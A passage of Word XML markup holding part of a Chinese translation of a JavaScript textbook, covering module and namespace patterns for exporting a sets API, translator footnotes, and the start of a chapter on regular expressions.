        <w:t>以便在外部也可以使用它，在这种情况下，我们通过返回这个构造函数来导出它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>它变成第一行代码所指的表达式的值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return Set;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}());//</w:t>
      </w:r>
      <w:r>
        <w:t>定义函数后立即执行</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>注意，这里使用了立即执行的匿名函数，这在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中是一种惯用法。如果想让代码在一个私有命名空间中运行，只须给这段代码加上前缀</w:t>
      </w:r>
      <w:r>
        <w:t>"(function(){"</w:t>
      </w:r>
      <w:r>
        <w:t>和后缀</w:t>
      </w:r>
      <w:r>
        <w:t>"}())"</w:t>
      </w:r>
      <w:r>
        <w:t>。开始的左圆括号确保这是一个函数表达式，而不是函数定义语句，因此可以给该前缀添加一个函数名来让代码变得更加清晰。在例</w:t>
      </w:r>
      <w:r>
        <w:t>9-24</w:t>
      </w:r>
      <w:r>
        <w:t>中使用了名字</w:t>
      </w:r>
      <w:r>
        <w:t>"invocation"</w:t>
      </w:r>
      <w:r>
        <w:t>，用以强调这个函数应当在定义之后立即执行。名字</w:t>
      </w:r>
      <w:r>
        <w:t>"namespace"</w:t>
      </w:r>
      <w:r>
        <w:t>也可以用来强调这个函数被用做命名空间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>一旦将模块代码封装进一个函数，就需要一些方法导出其公用</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，以便在模块函数的外部调用它们。在例</w:t>
      </w:r>
      <w:r>
        <w:t>9-24</w:t>
      </w:r>
      <w:r>
        <w:t>中，模块函数返回构造函数，这个构造函数随后赋值给一个全局变量。将值返回已经清楚地表明</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>已经导出在函数作用域之外。如果模块</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>包含多个单元，则它可以返回命名空间对象。对于</w:t>
      </w:r>
      <w:r>
        <w:t>sets</w:t>
      </w:r>
      <w:r>
        <w:t>模块来说，可以将代码写成这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>创建一个全局变量用来存放集合相关的模块</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var collections;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!collections)collections={};//</w:t>
      </w:r>
      <w:r>
        <w:t>定义</w:t>
      </w:r>
      <w:r>
        <w:t>sets</w:t>
      </w:r>
      <w:r>
        <w:t>模块</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>collections.sets=(function namespace(){//</w:t>
      </w:r>
      <w:r>
        <w:t>在这里定义多种</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>集合</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>类，使用局部变量和函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//……</w:t>
      </w:r>
      <w:r>
        <w:t>这里省略很多代码</w:t>
      </w:r>
      <w:r>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>通过返回命名空间对象将</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>导出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return{//</w:t>
      </w:r>
      <w:r>
        <w:t>导出的属性名：局部变量名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>AbstractSet:AbstractSet,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>NotSet:NotSet,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>AbstractEnumerableSet:AbstractEnumerableSet,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>SingletonSet:SingletonSet,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>AbstractWritableSet:AbstractWritableSet,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ArraySet:ArraySet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另外一种类似的技术是将模块函数当做构造函数，通过</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>来调用，通过将它们</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[17]</w:t>
      </w:r>
      <w:r>
        <w:t>赋值给</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>来将其导出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[18]</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var collections;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>if(!collections)collections={};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>collections.sets=(new function namespace(){//……</w:t>
      </w:r>
      <w:r>
        <w:t>这里省略很</w:t>
      </w:r>
      <w:r>
        <w:t>多代码</w:t>
      </w:r>
      <w:r>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>导出至</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.AbstractSet=AbstractSet;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.NotSet=NotSet;//……</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>注意，这里没有返回值</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作为一种替代方案，如果已经定义了全局命名空间对象，这个模块函数可以直接设置那个对象的属性，不用返回任何内容：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var collections;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!collections)collections={};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>collections.sets={};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">(function </w:t>
      </w:r>
      <w:r>
        <w:t>namespace(){//……</w:t>
      </w:r>
      <w:r>
        <w:t>这里省略很多代码</w:t>
      </w:r>
      <w:r>
        <w:t>……</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将共用</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>导出到上面创建的命名空间对象上</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>collections.sets.AbstractSet=AbstractSet;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>collections.sets.NotSet=NotSet;//……</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>导出的操作已经执行了，这里不需要再写</w:t>
      </w:r>
      <w:r>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:t>语句了</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有些框架实现了模块加载功能，其中包括其他一些导出模块</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的方法。比如，使用</w:t>
      </w:r>
      <w:r>
        <w:t>provides()</w:t>
      </w:r>
      <w:r>
        <w:t>函数来注册其</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>，提供</w:t>
      </w:r>
      <w:r>
        <w:t>exports</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[19]</w:t>
      </w:r>
      <w:r>
        <w:t>用以存储模块</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>。由于</w:t>
      </w:r>
      <w:r>
        <w:t>JavaS</w:t>
      </w:r>
      <w:r>
        <w:t>cript</w:t>
      </w:r>
      <w:r>
        <w:t>目前还不具备模块管理的能力，因此应当根据所使用的框架和工具包来选择合适的模块创建和导出</w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:t>的方式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>强</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>弱类型是指类型检查的严格程度，为所有变量指定数据类型称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>强类型</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>比如传统类的封装、继承和多态。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>参照：</w:t>
      </w:r>
      <w:r>
        <w:t>http://zh.wikipedia.org/zh/</w:t>
      </w:r>
      <w:r>
        <w:t>工厂方法。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>两个实部相等，虚部互为相反数的复数互为共轭复数。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>参照</w:t>
      </w:r>
      <w:r>
        <w:t>4.3</w:t>
      </w:r>
      <w:r>
        <w:t>节。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>这个例子的作者是</w:t>
      </w:r>
      <w:r>
        <w:t>Joshua Bloch</w:t>
      </w:r>
      <w:r>
        <w:t>，最初是基于</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>写的，可以在这里查看到：</w:t>
      </w:r>
      <w:r>
        <w:t>http://jcp.or</w:t>
      </w:r>
      <w:r>
        <w:t>g/aboutJava/communityprocess/jsr/tiger/enum.html</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>这里所说的起始点相同就是下边界相同。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r>
        <w:t>apply()</w:t>
      </w:r>
      <w:r>
        <w:t>的第二个参数是一个数组，数组成员就是参数列表。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[9]</w:t>
      </w:r>
      <w:r>
        <w:t>可参照</w:t>
      </w:r>
      <w:r>
        <w:t>Erich Gamma et al</w:t>
      </w:r>
      <w:r>
        <w:t>所著《</w:t>
      </w:r>
      <w:r>
        <w:t>Design Patterns</w:t>
      </w:r>
      <w:r>
        <w:t>》和</w:t>
      </w:r>
      <w:r>
        <w:t>Joshua Bloch</w:t>
      </w:r>
      <w:r>
        <w:t>所著《</w:t>
      </w:r>
      <w:r>
        <w:t>Effective Java</w:t>
      </w:r>
      <w:r>
        <w:t>》。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[10]</w:t>
      </w:r>
      <w:r>
        <w:t>作者这里的表述稍有含混，作者的意思应该是</w:t>
      </w:r>
      <w:r>
        <w:t>“Set</w:t>
      </w:r>
      <w:r>
        <w:t>子类的实例也是</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>的实例</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，而不是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>子类是</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>的实例</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[11]</w:t>
      </w:r>
      <w:r>
        <w:t>这里指的是实现</w:t>
      </w:r>
      <w:r>
        <w:t>类的不同的定制版本的解决办法，更直接地讲就是实现多态的方法。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="258" w:name="_12_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[12]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="258"/>
      <w:r>
        <w:t>这里指的是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>id”</w:t>
      </w:r>
      <w:r>
        <w:t>属性。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="259" w:name="_13_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[13]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="259"/>
      <w:r>
        <w:t>Monkey-patching</w:t>
      </w:r>
      <w:r>
        <w:t>是指修改现有对象的原型，在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中，修改对象的原型就相当于修改了实例化它的类。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="260" w:name="_14_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[14]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="260"/>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:t>运算符可以对对象成员进行遍历，包括对原型对象中的非内置成员进行遍历。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="261" w:name="_15_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[15]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="261"/>
      <w:r>
        <w:t>作者这里的表述是围绕</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>模块是一个可重用的代码片段</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>这一观念的，不论是从代码语法结构上解耦，还是将代码拆分至不同的文件中，只要用某种方法将代码</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>分离</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，就认为是一个模块，因此作者说任何代码都可以处理为一个模块。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="262" w:name="_16_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[16]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="262"/>
      <w:r>
        <w:t>这里的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>原始上下文</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>是指调用模块时所在的上下文，可能处在一个很深的闭包当中，但这个模块的逻辑不应该影响到其他的上下文特别是全局上下文。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="263" w:name="_17_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[17]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="263"/>
      <w:r>
        <w:t>这里作者所说的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>它们</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>是指构造函数创建的新实例。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="264" w:name="_18_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[18]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="264"/>
      <w:r>
        <w:t>使用构造函数和模块函数来实现私有成员的原理是一模一样的，只是调用的方式不一样。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:bookmarkStart w:id="265" w:name="_19_"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[19]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="265"/>
      <w:r>
        <w:t>可以参照</w:t>
      </w:r>
      <w:r>
        <w:t>CommonJS</w:t>
      </w:r>
      <w:r>
        <w:t>规范</w:t>
      </w:r>
      <w:r>
        <w:t>http://commonjs.org</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="266" w:name="Di_10Zhang__Zheng_Ze_Biao_Da_Shi_De_Mo_S"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>章　正则表达式的模式匹配</w:t>
      </w:r>
      <w:bookmarkEnd w:id="266"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>正则表达式（</w:t>
      </w:r>
      <w:r>
        <w:t>regular expression</w:t>
      </w:r>
      <w:r>
        <w:t>）是一个描述字符模式的对象。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>类表示正则表达式，</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>都定义了方法，后者使用正则表达式进行强大的模式匹配和文本检索与替换功能。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的正则表达式语法是</w:t>
      </w:r>
      <w:r>
        <w:t>Perl5</w:t>
      </w:r>
      <w:r>
        <w:t>的正则表达式语法的大型子集，所以对于有</w:t>
      </w:r>
      <w:r>
        <w:t>Perl</w:t>
      </w:r>
      <w:r>
        <w:t>编程经验的程序员来说，学习</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
